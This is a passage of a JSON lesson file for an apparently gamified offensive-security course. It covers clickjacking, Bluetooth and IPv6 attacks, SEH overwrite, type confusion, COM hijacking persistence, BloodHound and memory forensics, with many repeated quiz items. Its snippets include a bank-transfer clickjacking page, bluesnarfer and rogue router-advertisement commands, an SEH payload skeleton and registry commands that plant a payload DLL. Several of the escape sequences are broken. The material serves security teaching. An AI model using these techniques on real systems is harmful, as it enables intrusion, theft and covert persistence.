methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"web-clickjacking","cat":"Web Application","title":"Clickjacking","diff":1,"xp":75,"intro":"Trick users into clicking hidden buttons by framing the target page.","sections":[{"type":"text","content":"Embed the target site in an invisible iframe. The user thinks they're clicking your page but actually clicks a button on the framed site."},{"type":"code","lang":"html","content":"<!-- Attacker's page -->\n<style>\niframe { opacity: 0; position: absolute; top: 0; left: 0; width: 100%; height: 100%; }\n</style>\n<h1>Click here to win a prize!</h1>\n<iframe src=\"https://bank.com/transfer?to=attacker&amount=10000\"></iframe>\n\n<!-- Defense: X-Frame-Options header -->\nX-Frame-Options: DENY\nContent-Security-Policy: frame-ancestors 'none'"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Clickjacking is prevented by...","opts":["CSRF tokens","X-Frame-Options / CSP frame-ancestors","Input validation","Encryption"],"ans":1},{"type":"quiz","q":"What does a WHOIS query reveal?","opts":["Server vulnerabilities","Domain registration details","Passwords","Network traffic"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","User credentials"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"network-bluetooth-hacking","cat":"Network Attacks","title":"Bluetooth Hacking","diff":2,"xp":150,"intro":"Discover, probe, and exploit Bluetooth devices.","sections":[{"type":"text","content":"Bluetooth attacks: sniff traffic (BLE sniffing), crack PINs, exploit known CVEs (BlueBorne), or force pairing."},{"type":"code","lang":"bash","content":"# Scan for Bluetooth devices\nhcitool scan\n# BLE scan\nhcitool lescan\n# Service discovery\nsdptool browse XX:XX:XX:XX:XX:XX\n# Exploit with bluesnarfer\nbluesnarfer -r 1-100 -b XX:XX:XX:XX:XX:XX\n# BLE sniffing with Ubertooth\nubertooth-btle -f"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"BlueBorne was a critical vulnerability in...","opts":["Wi-Fi","Bluetooth","NFC","Zigbee"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"network-ipv6-attacks","cat":"Network Attacks","title":"IPv6 Attack Techniques","diff":2,"xp":150,"intro":"Many networks deploy IPv6 alongside IPv4 \u2014 and forget to secure it.","sections":[{"type":"text","content":"Dual-stack networks often have no IPv6 firewall rules. Router advertisements can be spoofed to become the default gateway."},{"type":"code","lang":"bash","content":"# IPv6 neighbor discovery\nnmap -6 --script=targets-ipv6-multicast-echo fe80::1%eth0\n# Rogue router advertisement (become default gateway)\natk6-fake_router26 eth0 fe80::1\n# Scan IPv6 hosts\nnmap -6 -sV fe80::1%eth0\n# Many firewalls only filter IPv4 \u2014 IPv6 traffic passes unchecked"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"IPv6 is often less secured because...","opts":["It's newer","Admins forget to add IPv6 firewall rules","It's encrypted","It doesn't support routing"],"ans":1},{"type":"quiz","q":"What is the main risk of active recon?","opts":["It's slow","The target can detect your scanning","It costs money","It requires admin access"],"ans":1},{"type":"quiz","q":"Which tool is best for subdomain enumeration?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"exploit-seh-overwrite","cat":"Exploitation","title":"SEH Overwrite (Windows)","diff":3,"xp":250,"intro":"Overwrite the Structured Exception Handler for code execution.","sections":[{"type":"text","content":"Windows SEH chain handles exceptions. Overflow into the SEH record, trigger an exception, and your handler (shellcode address) runs."},{"type":"code","lang":"python","content":"from pwn import *\n# SEH overwrite payload structure:\n# [buffer] [nSEH: short jmp] [SEH: pop-pop-ret gadget] [nops] [shellcode]\nbuf = b'A' * offset\nbuf += b'xebx06x90x90'  # nSEH: short jump over SEH\nbuf += p32(ppr_addr)          # SEH: pop-pop-ret gadget\nbuf += b'x90' * 16\nbuf += shellcode"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"In SEH exploitation, nSEH contains a...","opts":["NOP sled","Short jump to skip over the SEH entry","Return address","Shellcode"],"ans":1},{"type":"quiz","q":"Instance metadata is accessible at...","opts":["8.8.8.8","127.0.0.1","169.254.169.254","10.0.0.1"],"ans":2},{"type":"quiz","q":"Docker containers share the host's...","opts":["Nothing","Kernel","RAM only","Disk only"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"exploit-type-confusion","cat":"Exploitation","title":"Type Confusion Vulnerabilities","diff":3,"xp":250,"intro":"Treat an object as the wrong type for memory corruption.","sections":[{"type":"text","content":"Type confusion occurs when code doesn't verify an object's type before using it. Treating a small object as a large one reads/writes out of bounds."},{"type":"code","lang":"c","content":"// Type confusion example\nstruct Small { int x; };           // 4 bytes\nstruct Large { int x; char buf[64]; }; // 68 bytes\n\nvoid process(void *obj, int type) {\n  if (type == LARGE) {\n    struct Large *l = (struct Large *)obj;\n    // If obj is actually Small, buf access is OOB\n    memcpy(l->buf, input, 64);  // heap overflow!\n  }\n}"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Type confusion leads to...","opts":["SQL injection","Out-of-bounds memory access","XSS","DNS spoofing"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike Network"],"ans":0},{"type":"quiz","q":"What does a WHOIS query reveal?","opts":["Server vulnerabilities","Domain registration details","Passwords","Network traffic"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"postexploit-com-hijacking","cat":"Post-Exploitation","title":"COM Object Hijacking Persistence","diff":3,"xp":200,"intro":"Hijack COM object loading for stealthy persistence.","sections":[{"type":"text","content":"Windows loads COM objects by CLSID from the registry. Create an HKCU entry that overrides the HKLM default, and your DLL loads instead."},{"type":"code","lang":"powershell","content":"# Find COM objects loaded by target processes\n# Process Monitor: filter Operation=RegOpenKey, Path contains InProcServer32\n# Hijack: create HKCU override\nNew-Item -Path 'HKCU:SoftwareClassesCLSID{target-clsid}InProcServer32' -Force\nSet-ItemProperty -Path 'HKCU:SoftwareClassesCLSID{target-clsid}InProcServer32' -Name '(Default)' -Value 'C:payload.dll'"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"COM hijacking works because HKCU registry entries...","opts":["Are ignored","Take priority over HKLM for the current user","Require admin","Are encrypted"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"postexploit-bloodhound","cat":"Post-Exploitation","title":"BloodHound AD Enumeration","diff":2,"xp":150,"intro":"Map the entire Active Directory attack path visually.","sections":[{"type":"text","content":"BloodHound collects AD relationships and finds the shortest path to Domain Admin. It reveals who can DCSync, who has local admin, and kerberoastable accounts."},{"type":"code","lang":"bash","content":"# Collect data with SharpHound\n.SharpHound.exe --CollectionMethods All --Domain corp.local\n# Or from Linux\nbloodyAD -d corp.local -u user -p pass --host dc01 get search --scope sub\n# Import into BloodHound GUI\n# Drag & drop the ZIP file\n# Key queries:\n# 'Shortest Path to Domain Admin'\n# 'Kerberoastable Users'\n# 'Users with DCSync Rights'"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"BloodHound visualizes...","opts":["Network traffic","Active Directory attack paths and relationships","File system permissions","Firewall rules"],"ans":1},{"type":"quiz","q":"A 403 response means...","opts":["Not found","Forbidden","Server error","Redirect"],"ans":1},{"type":"quiz","q":"Which encoding prevents XSS in HTML output?","opts":["Base64","URL encoding","HTML entity encoding","Hex encoding"],"ans":2},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"forensics-volatility3","cat":"Forensics & IR","title":"Volatility 3 (Modern Memory Forensics)","diff":2,"xp":150,"intro":"The latest Volatility \u2014 Python 3, faster, with new plugins.","sections":[{"type":"text","content":"Volatility 3 rewrites the framework in Python 3. New plugin system, better symbol tables, and faster processing of large memory dumps."},{"type":"code","lang":"bash","content":"# Volatility 3 commands\nvol -f memory.dmp windows.pslist\nvol -f memory.dmp windows.netscan\nvol -f memory.dmp windows.malfind\nvol -f memory.dmp windows.hashdump\nvol -f memory.dmp windows.cmdline\nvol -f memory.dmp windows.filescan | grep -i 'password|secret'"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Volatility 3 uses which Python version?","opts":["Python 2","Python 3","Jython","IronPython"],"ans":1},{"type":"quiz","q":"Which HTTP method is used to submit form data?","opts":["GET","POST","PUT","TRACE"],"ans":1},{"type":"quiz","q":"What header prevents clickjacking?","opts":["X-XSS-Protection","Content-Type","X-Frame-Options","Cache-Control"],"ans":2},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping 